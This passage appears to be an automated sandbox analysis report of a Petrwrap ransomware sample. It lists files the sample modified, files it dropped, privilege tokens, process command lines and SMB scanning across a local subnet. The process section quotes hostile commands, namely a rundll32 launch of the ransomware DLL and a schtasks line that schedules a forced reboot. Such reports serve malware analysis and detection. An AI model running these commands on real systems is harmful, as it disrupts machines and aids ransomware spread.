| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Dark.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Complex Machine.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\CompressImport.asp | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\jawt.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Archive.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.XLS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\classfile_constants.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\javafx-src.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\lib\amd64\jvm.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.XLS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Welcome.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\jni.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\deploy\ffjcext.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.PPT | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Light.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCallbacks.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\lib\deploy\ffjcext.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\Office16\OSPP.VBS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\firefox.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\NewAdd.vsdx | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Light.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Light.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\jdwpTransport.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\jawt_md.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\amd64\jvm.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Acrobat Pro DC.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Bus Schedule.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\jvmti.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\jvmticmlr.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\Windows\SHELLNEW\EXCEL12.XLSX | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\SyncConnect.ppt | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.c | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\027cc450ef5f8c5f653329641ec1fed9 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\dllhost.dat | C:\Windows\SysWOW64\rundll32.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\56AB.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\56AB.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\56AB.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\56AB.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\56AB.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\56AB.tmp | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\56AB.tmp | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\027cc450ef5f8c5f653329641ec1fed9.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\027cc450ef5f8c5f653329641ec1fed9.dll,#1
C:\Windows\SysWOW64\cmd.exe
/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 02:03
C:\Users\Admin\AppData\Local\Temp\56AB.tmp
"C:\Users\Admin\AppData\Local\Temp\56AB.tmp" \\.\pipe\{BE829EEB-6C2A-49B3-89FF-523499492D5F}
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 02:03
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| DE | 136.243.69.123:445 | tcp | |
| SG | 20.44.239.154:445 | settings-win.data.microsoft.com | tcp |
| N/A | 10.127.0.1:445 | tcp | |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| N/A | 10.127.0.0:445 | tcp | |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| SG | 20.44.239.154:139 | settings-win.data.microsoft.com | tcp |
| N/A | 10.127.0.1:139 | tcp | |
| DE | 136.243.69.123:139 | tcp | |
| N/A | 10.127.0.0:139 | tcp | |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.0.1:139 | tcp | |
| N/A | 10.127.0.2:445 | tcp | |
| N/A | 10.127.0.2:139 | tcp | |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| N/A | 10.127.0.3:445 | tcp | |
| N/A | 10.127.0.3:139 | tcp | |
| N/A | 10.127.0.4:445 | tcp | |
| N/A | 10.127.0.4:139 | tcp | |
| N/A | 10.127.0.5:445 | tcp | |
| N/A | 10.127.0.5:139 | tcp | |
| N/A | 10.127.0.6:445 | tcp | |
| N/A | 10.127.0.6:139 | tcp | |
| N/A | 10.127.0.7:445 | tcp | |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| N/A | 10.127.0.7:139 | tcp | |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| N/A | 10.127.0.8:445 | tcp | |
| US | 8.8.8.8:53 | 107.12.20.2.in-addr.arpa | udp |
| N/A | 10.127.0.8:139 | tcp | |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.0.9:139 | tcp | |
| N/A | 10.127.0.10:445 | tcp | |
| N/A | 10.127.0.10:139 | tcp | |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.0.11:139 | tcp | |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.0.12:139 | tcp | |
| N/A | 10.127.0.13:445 | tcp | |
| N/A | 10.127.0.13:139 | tcp | |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.0.14:139 | tcp | |
| N/A | 10.127.0.15:445 | tcp | |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| N/A | 10.127.0.15:139 | tcp | |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.0.16:139 | tcp | |
| N/A | 10.127.0.17:445 | tcp | |
| N/A | 10.127.0.17:139 | tcp | |
| N/A | 10.127.0.18:445 | tcp | |
| N/A | 10.127.0.18:139 | tcp | |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.0.19:139 | tcp | |
| N/A | 10.127.0.20:445 | tcp | |
| N/A | 10.127.0.20:139 | tcp | |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.0.21:139 | tcp | |
| N/A | 10.127.0.22:445 | tcp | |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| N/A | 10.127.0.22:139 | tcp | |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| N/A | 10.127.0.23:445 | tcp | |
| N/A | 10.127.0.23:139 | tcp | |
| N/A | 10.127.0.24:445 | tcp | |
| N/A | 10.127.0.24:139 | tcp | |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.0.25:139 | tcp | |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.0.26:139 | tcp | |
| N/A | 10.127.0.27:445 | tcp | |
| N/A | 10.127.0.27:139 | tcp | |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.0.28:139 | tcp | |
| N/A | 10.127.0.29:445 | tcp | |
| N/A | 10.127.0.29:139 | tcp | |
| N/A | 10.127.0.30:445 | tcp | |
| N/A | 10.127.0.30:139 | tcp | |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.0.31:139 | tcp | |
| N/A | 10.127.0.32:445 | tcp | |
| N/A | 10.127.0.32:139 | tcp | |
| N/A | 10.127.0.33:445 | tcp | |
| N/A | 10.127.0.33:139 | tcp | |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.0.34:139 | tcp | |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.0.35:139 | tcp | |
| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.0.36:139 | tcp | |
| N/A | 10.127.0.37:445 | tcp | |
| N/A | 10.127.0.37:139 | tcp | |
| N/A | 10.127.0.38:445 | tcp | |
| N/A | 10.127.0.38:139 | tcp | |
| N/A | 10.127.0.39:445 | tcp | |
| N/A | 10.127.0.39:139 | tcp | |
| N/A | 10.127.0.40:445 | tcp | |
| N/A | 10.127.0.40:139 | tcp | |
| N/A | 10.127.0.41:445 | tcp | |
| N/A | 10.127.0.41:139 | tcp | |
| N/A | 10.127.0.42:445 | tcp | |
| N/A | 10.127.0.42:139 | tcp | |
| N/A | 10.127.0.43:445 | tcp | |
| N/A | 10.127.0.43:139 | tcp | |
| N/A | 10.127.0.44:445 | tcp | |
| N/A | 10.127.0.44:139 | tcp | |
| N/A | 10.127.0.45:445 | tcp | |
| N/A | 10.127.0.45:139 | tcp | |
| N/A | 10.127.0.46:445 | tcp | |
| N/A | 10.127.0.46:139 | tcp | |
| N/A | 10.127.0.47:445 | tcp | |
| N/A | 10.127.0.47:139 | tcp | |
| N/A | 10.127.0.48:445 | tcp | |
| N/A | 10.127.0.48:139 | tcp | |
| N/A | 10.127.0.49:445 | tcp | |
| N/A | 10.127.0.49:139 | tcp | |
| N/A | 10.127.0.2:445 | tcp | |
| US | 52.111.227.13:445 | nexusrules.officeapps.live.com | tcp |
| N/A | 10.127.0.0:445 | tcp | |
| N/A | 10.127.0.3:445 | tcp | |
| N/A | 10.127.0.50:445 | tcp | |
| N/A | 10.127.0.3:139 | tcp | |
| N/A | 10.127.0.2:139 | tcp | |
| US | 52.111.227.13:139 | nexusrules.officeapps.live.com | tcp |
| N/A | 10.127.0.0:139 | tcp | |
| N/A | 10.127.0.50:139 | tcp | |
| N/A | 10.127.0.51:445 | tcp | |
| N/A | 10.127.0.51:139 | tcp | |
| N/A | 10.127.0.52:445 | tcp | |
| N/A | 10.127.0.52:139 | tcp | |
| N/A | 10.127.0.53:445 | tcp | |
| N/A | 10.127.0.53:139 | tcp | |
| N/A | 10.127.0.54:445 | tcp | |
| N/A | 10.127.0.54:139 | tcp | |
| N/A | 10.127.0.55:445 | tcp | |
| N/A | 10.127.0.5:445 | tcp | |
| N/A | 10.127.0.55:139 | tcp | |
| US | 8.8.8.8:53 | 2.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.5:139 | tcp | |
| N/A | 10.127.0.56:445 | tcp | |
| N/A | 10.127.0.56:139 | tcp | |
| N/A | 10.127.0.6:445 | tcp | |
| N/A | 10.127.0.7:445 | tcp | |
| N/A | 10.127.0.8:445 | tcp | |
| N/A | 10.127.0.6:139 | tcp | |
| N/A | 10.127.0.8:139 | tcp | |
| N/A | 10.127.0.7:139 | tcp | |
| N/A | 10.127.0.57:445 | tcp | |
| N/A | 10.127.0.57:139 | tcp | |
| N/A | 10.127.0.58:445 | tcp | |
| N/A | 10.127.0.58:139 | tcp | |
| N/A | 10.127.0.59:445 | tcp | |
| N/A | 10.127.0.59:139 | tcp | |
| N/A | 10.127.0.60:445 | tcp | |
| N/A | 10.127.0.60:139 | tcp | |
| N/A | 10.127.0.61:445 | tcp | |
| US | 8.8.8.8:53 | 5.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.61:139 | tcp | |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.0.62:445 | tcp | |
| US | 8.8.8.8:53 | 8.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.9:139 | tcp | |
| N/A | 10.127.0.62:139 | tcp | |
| N/A | 10.127.0.63:445 | tcp | |
| N/A | 10.127.0.10:445 | tcp | |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.0.12:139 | tcp | |
| N/A | 10.127.0.11:139 | tcp | |
| N/A | 10.127.0.10:139 | tcp | |
| N/A | 10.127.0.63:139 | tcp | |
| N/A | 10.127.0.64:445 | tcp | |
| N/A | 10.127.0.64:139 | tcp | |
| N/A | 10.127.0.65:445 | tcp | |
| N/A | 10.127.0.65:139 | tcp | |
| N/A | 10.127.0.66:445 | tcp | |
| N/A | 10.127.0.66:139 | tcp | |
| N/A | 10.127.0.67:445 | tcp | |
| N/A | 10.127.0.67:139 | tcp | |
| US | 8.8.8.8:53 | 9.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.68:445 | tcp | |
| N/A | 10.127.0.68:139 | tcp | |
| N/A | 10.127.0.13:445 | tcp | |
| US | 8.8.8.8:53 | 11.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.69:445 | tcp | |
| N/A | 10.127.0.13:139 | tcp | |
| N/A | 10.127.0.69:139 | tcp | |
| N/A | 10.127.0.15:445 | tcp | |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.0.70:445 | tcp | |
| N/A | 10.127.0.14:139 | tcp | |
| N/A | 10.127.0.15:139 | tcp | |
| N/A | 10.127.0.16:139 | tcp | |
| N/A | 10.127.0.70:139 | tcp | |
| N/A | 10.127.0.71:445 | tcp | |
| N/A | 10.127.0.71:139 | tcp | |
| N/A | 10.127.0.72:445 | tcp | |
| N/A | 10.127.0.72:139 | tcp | |
| N/A | 10.127.0.73:445 | tcp | |
| N/A | 10.127.0.73:139 | tcp | |
| N/A | 10.127.0.74:445 | tcp | |
| US | 8.8.8.8:53 | 13.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.74:139 | tcp | |
| N/A | 10.127.0.75:445 | tcp | |
| US | 8.8.8.8:53 | 15.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.17:445 | tcp | |
| US | 8.8.8.8:53 | 14.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.75:139 | tcp | |
| N/A | 10.127.0.17:139 | tcp | |
| N/A | 10.127.0.76:445 | tcp | |
| N/A | 10.127.0.20:445 | tcp | |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.0.18:445 | tcp | |
| N/A | 10.127.0.76:139 | tcp | |
| N/A | 10.127.0.20:139 | tcp | |
| N/A | 10.127.0.19:139 | tcp | |
| N/A | 10.127.0.18:139 | tcp | |
| N/A | 10.127.0.77:445 | tcp | |
| N/A | 10.127.0.77:139 | tcp | |
| N/A | 10.127.0.78:445 | tcp | |
| N/A | 10.127.0.78:139 | tcp | |
| N/A | 10.127.0.79:445 | tcp | |
| N/A | 10.127.0.79:139 | tcp | |
| N/A | 10.127.0.80:445 | tcp | |
| N/A | 10.127.0.80:139 | tcp | |
| N/A | 10.127.0.81:445 | tcp | |
| US | 8.8.8.8:53 | 17.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.81:139 | tcp | |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.0.82:445 | tcp | |
| US | 8.8.8.8:53 | 19.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.21:139 | tcp | |
| US | 8.8.8.8:53 | 18.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.82:139 | tcp | |
| N/A | 10.127.0.22:445 | tcp | |
| N/A | 10.127.0.24:445 | tcp | |
| N/A | 10.127.0.23:445 | tcp | |
| N/A | 10.127.0.83:445 | tcp | |
| N/A | 10.127.0.22:139 | tcp | |
| N/A | 10.127.0.23:139 | tcp | |
| N/A | 10.127.0.24:139 | tcp | |
| N/A | 10.127.0.83:139 | tcp | |
| N/A | 10.127.0.84:445 | tcp | |
| N/A | 10.127.0.84:139 | tcp | |
| N/A | 10.127.0.85:445 | tcp | |
| N/A | 10.127.0.85:139 | tcp | |
| N/A | 10.127.0.86:445 | tcp | |
| N/A | 10.127.0.86:139 | tcp | |
| N/A | 10.127.0.87:445 | tcp | |
| N/A | 10.127.0.87:139 | tcp | |
| US | 8.8.8.8:53 | 21.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.88:445 | tcp | |
| N/A | 10.127.0.88:139 | tcp | |
| US | 8.8.8.8:53 | 22.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.0.25:139 | tcp | |
| N/A | 10.127.0.89:445 | tcp | |
| N/A | 10.127.0.89:139 | tcp | |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.0.27:445 | tcp | |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.0.27:139 | tcp | |
| N/A | 10.127.0.26:139 | tcp | |
| N/A | 10.127.0.28:139 | tcp | |
| N/A | 10.127.0.90:445 | tcp | |
| N/A | 10.127.0.90:139 | tcp | |
| N/A | 10.127.0.91:445 | tcp | |
| N/A | 10.127.0.91:139 | tcp | |
| N/A | 10.127.0.92:445 | tcp | |
| N/A | 10.127.0.93:445 | tcp | |
| N/A | 10.127.0.93:139 | tcp | |
| N/A | 10.127.0.94:445 | tcp | |
| N/A | 10.127.0.94:139 | tcp | |
| N/A | 10.127.0.95:445 | tcp | |
| US | 8.8.8.8:53 | 25.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.95:139 | tcp | |
| N/A | 10.127.0.96:445 | tcp | |
| N/A | 10.127.0.29:445 | tcp | |
| US | 8.8.8.8:53 | 27.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.29:139 | tcp | |
| N/A | 10.127.0.96:139 | tcp | |
| N/A | 10.127.0.97:445 | tcp | |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.0.30:445 | tcp | |
| N/A | 10.127.0.32:445 | tcp | |
| N/A | 10.127.0.97:139 | tcp | |
| N/A | 10.127.0.30:139 | tcp | |
| N/A | 10.127.0.31:139 | tcp | |
| N/A | 10.127.0.32:139 | tcp | |
| N/A | 10.127.0.98:445 | tcp | |
| N/A | 10.127.0.98:139 | tcp | |
| N/A | 10.127.0.99:445 | tcp | |
| N/A | 10.127.0.99:139 | tcp | |
| N/A | 10.127.0.100:445 | tcp | |
| N/A | 10.127.0.100:139 | tcp | |
| N/A | 10.127.0.101:445 | tcp | |
| N/A | 10.127.0.101:139 | tcp | |
| US | 8.8.8.8:53 | 29.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.102:445 | tcp | |
| N/A | 10.127.0.102:139 | tcp | |
| N/A | 10.127.0.33:445 | tcp | |
| US | 8.8.8.8:53 | 30.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.103:445 | tcp | |
| US | 8.8.8.8:53 | 32.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.33:139 | tcp | |
| N/A | 10.127.0.103:139 | tcp | |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.0.104:445 | tcp | |
| N/A | 10.127.0.104:139 | tcp | |
| N/A | 10.127.0.34:139 | tcp | |
| N/A | 10.127.0.35:139 | tcp | |
| N/A | 10.127.0.36:139 | tcp | |
| N/A | 10.127.0.105:445 | tcp | |
| N/A | 10.127.0.105:139 | tcp | |
| N/A | 10.127.0.106:445 | tcp | |
| N/A | 10.127.0.106:139 | tcp | |
| N/A | 10.127.0.107:445 | tcp | |
| N/A | 10.127.0.107:139 | tcp | |
| N/A | 10.127.0.108:445 | tcp | |
| N/A | 10.127.0.108:139 | tcp | |
| US | 8.8.8.8:53 | 33.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.109:445 | tcp | |
| N/A | 10.127.0.109:139 | tcp | |
| N/A | 10.127.0.37:445 | tcp | |
| US | 8.8.8.8:53 | 35.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.37:139 | tcp | |
| US | 8.8.8.8:53 | 36.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.110:445 | tcp | |
| N/A | 10.127.0.110:139 | tcp | |
| N/A | 10.127.0.38:445 | tcp | |
| N/A | 10.127.0.39:445 | tcp | |
| N/A | 10.127.0.40:445 | tcp | |
| N/A | 10.127.0.38:139 | tcp | |
| N/A | 10.127.0.39:139 | tcp | |
| N/A | 10.127.0.40:139 | tcp | |
| N/A | 10.127.0.111:445 | tcp | |
| N/A | 10.127.0.111:139 | tcp | |
| N/A | 10.127.0.112:445 | tcp | |
| N/A | 10.127.0.112:139 | tcp | |
| N/A | 10.127.0.113:445 | tcp | |
| N/A | 10.127.0.113:139 | tcp | |
| N/A | 10.127.0.114:445 | tcp | |
| N/A | 10.127.0.114:139 | tcp | |
| N/A | 10.127.0.115:445 | tcp | |
| US | 8.8.8.8:53 | 37.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.115:139 | tcp | |
| N/A | 10.127.0.116:445 | tcp | |
| N/A | 10.127.0.41:445 | tcp | |
| US | 8.8.8.8:53 | 38.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.41:139 | tcp | |
| N/A | 10.127.0.116:139 | tcp | |
| US | 8.8.8.8:53 | 40.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.117:445 | tcp | |
| N/A | 10.127.0.42:445 | tcp | |
| N/A | 10.127.0.43:445 | tcp | |
| N/A | 10.127.0.44:445 | tcp | |
| N/A | 10.127.0.117:139 | tcp | |
| N/A | 10.127.0.42:139 | tcp | |
| N/A | 10.127.0.43:139 | tcp | |
| N/A | 10.127.0.44:139 | tcp | |
| N/A | 10.127.0.118:445 | tcp | |
| N/A | 10.127.0.118:139 | tcp | |
| N/A | 10.127.0.119:445 | tcp | |
| N/A | 10.127.0.119:139 | tcp | |
| N/A | 10.127.0.120:445 | tcp | |
| N/A | 10.127.0.120:139 | tcp | |
| N/A | 10.127.0.121:445 | tcp | |
| N/A | 10.127.0.121:139 | tcp | |
| US | 8.8.8.8:53 | 41.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.122:445 | tcp | |
| N/A | 10.127.0.122:139 | tcp | |
| N/A | 10.127.0.45:445 | tcp | |
| US | 8.8.8.8:53 | 42.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.123:445 | tcp | |
| US | 8.8.8.8:53 | 44.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.45:139 | tcp | |
| N/A | 10.127.0.123:139 | tcp | |
| N/A | 10.127.0.46:445 | tcp | |
| N/A | 10.127.0.47:445 | tcp | |
| US | 20.189.173.16:445 | self.events.data.microsoft.com | tcp |
| N/A | 10.127.0.124:445 | tcp | |
| N/A | 10.127.0.46:139 | tcp | |
| N/A | 10.127.0.47:139 | tcp | |
| US | 20.189.173.16:139 | self.events.data.microsoft.com | tcp |
| N/A | 10.127.0.124:139 | tcp | |
| N/A | 10.127.0.125:445 | tcp | |
| N/A | 10.127.0.125:139 | tcp | |
| N/A | 10.127.0.126:445 | tcp | |
| N/A | 10.127.0.126:139 | tcp | |
| N/A | 10.127.0.127:445 | tcp | |
| N/A | 10.127.0.127:139 | tcp | |
| N/A | 10.127.0.128:445 | tcp | |
| US | 8.8.8.8:53 | 45.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.128:139 | tcp | |
| N/A | 10.127.0.129:445 | tcp | |
| N/A | 10.127.0.129:139 | tcp | |
